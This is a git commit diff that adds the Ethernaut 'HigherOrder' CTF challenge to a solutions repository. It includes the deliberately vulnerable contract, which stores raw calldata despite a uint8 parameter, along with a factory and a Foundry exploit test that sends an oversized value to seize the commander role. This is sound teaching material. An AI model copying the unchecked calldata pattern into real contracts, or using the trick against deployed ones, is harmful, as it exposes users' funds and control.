add Ethernaut 30. HigherOrder

Author: minaminao

README.md

@@ -289,6 +289,7 @@ Note:
 | [BlazCTF 2023: Jambo](src/BlazCTF2023/)                         |                                         |
 | [BlazCTF 2023: Ghost](src/BlazCTF2023/)                         |                                         |
 | [Curta: Lana](src/Curta/20_Lana/)                               | LLVM                                    |
+| [Ethernaut: 30. HigherOrder](src/Ethernaut/HigherOrder/)        | calldata                                |
 
 ### EVM assembly logic bugs
 - Logic bugs in assemblies such as Yul

src/Ethernaut/HigherOrder/Exploit.t.sol

@@ -0,0 +1,23 @@
+// SPDX-License-Identifier: UNLICENSED
+pragma solidity ^0.8.13;
+
+import "forge-std/Test.sol";
+import "./HigherOrderFactory.sol";
+
+contract HigherOrderExploitTest is Test {
+    function test() public {
+        address playerAddress = makeAddr("player");
+        vm.deal(playerAddress, 1 ether);
+        HigherOrderFactory factory = new HigherOrderFactory();
+        address instanceAddress = factory.createInstance(playerAddress);
+
+        vm.startPrank(playerAddress, playerAddress);
+
+        instanceAddress.call(bytes.concat(HigherOrder.registerTreasury.selector, bytes32(uint256(0x100))));
+        instanceAddress.call(abi.encodeWithSignature("claimLeadership()"));
+
+        vm.stopPrank();
+
+        assertTrue(factory.validateInstance(payable(instanceAddress), playerAddress), "Invalid Instance");
+    }
+}

src/Ethernaut/HigherOrder/HigherOrder-8.sol

@@ -0,0 +1,19 @@
+// SPDX-License-Identifier: MIT
+pragma solidity ^0.8.20;
+
+contract HigherOrder {
+    address public commander;
+
+    uint256 public treasury;
+
+    function registerTreasury(uint8) public {
+        assembly {
+            sstore(treasury.slot, calldataload(4))
+        }
+    }
+
+    function claimLeadership() public {
+        if (treasury > 255) commander = msg.sender;
+        else revert("Only members of the Higher Order can become Commander");
+    }
+}

src/Ethernaut/HigherOrder/HigherOrder.sol

@@ -0,0 +1,19 @@
+// SPDX-License-Identifier: MIT
+pragma solidity 0.6.12;
+
+contract HigherOrder {
+    address public commander;
+
+    uint256 public treasury;
+
+    function registerTreasury(uint8) public {
+        assembly {
+            sstore(treasury_slot, calldataload(4))
+        }
+    }
+
+    function claimLeadership() public {
+        if (treasury > 255) commander = msg.sender;
+        else revert("Only members of the Higher Order can become Commander");
+    }
+}

src/Ethernaut/HigherOrder/HigherOrderFactory.sol

@@ -0,0 +1,17 @@
+// SPDX-License-Identifier: MIT
+pragma solidity ^0.8.20;
+
+import "../Ethernaut/Level.sol";
+import "./HigherOrder-8.sol";
+import "src/utils/Create.sol";
+
+contract HigherOrderFactory is Level {
+    function createInstance(address _player) public payable override returns (address) {
+        return Create.deploy("HigherOrder.sol:HigherOrder");
+    }
+
+    function validateInstance(address payable _instance, address _player) public override returns (bool) {
+        HigherOrder instance = HigherOrder(_instance);
+        return instance.commander() == _player;
+    }
+}

src/Ethernaut/README.md

@@ -452,3 +452,11 @@ forge test --match-contract SwitchExploit -vvvv
 ```sh
 forge script SwitchExploitScript -vvvv --private-key $PRIVATE_KEY --fork-url $RPC_URL --broadcast --sig "run(address)" $INSTANCE_ADDRESS
 ```
+
+## 30. HigherOrder
+[Challenge & Exploit codes](HigherOrder)
+
+**Test**
+```sh
+forge test --match-contract HigherOrderExploit -vvvv
+```